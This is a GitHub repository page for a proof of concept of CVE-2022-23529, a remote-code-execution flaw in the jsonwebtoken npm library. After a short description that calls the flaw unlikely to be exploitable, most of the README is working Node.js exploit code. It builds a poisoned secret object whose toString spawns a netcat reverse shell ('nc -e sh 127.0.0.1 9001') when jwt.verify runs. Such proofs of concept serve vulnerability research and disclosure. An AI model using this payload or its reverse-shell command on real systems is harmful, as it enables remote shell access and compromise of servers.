Skip to content

hackintoanetwork/CVE-2022-23529-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

CVE-2022-23529

The JSON Web Token (JWT) library versions prior to 3.4.6, 4.0.4, and 4.1.5 are vulnerable to RCE.

The HMAC hashing functions take any string as input which leads to RCE.

Due to the preconditions, this vulnerability is not likly to be exploitable.

In order to exploit this vulnerability an attacker would need one of the following conditions to be true:

  • The server does not store secret keys securely.
  • The attacker needs to have access to and control the secret keys.

npm install jsonwebtoken@8.5.1

var jwt = require('jsonwebtoken');

create a token using the servers secret

var token = jwt.sign({"x":"y"}, 'servers_secret');

create malicious object containing a reverse shell (node.js)

var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

server verifies the token using malicious object stored as secret

jwt.verify(token, poisoned_secret_on_server);

About

CVE-2022-23529-PoC

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published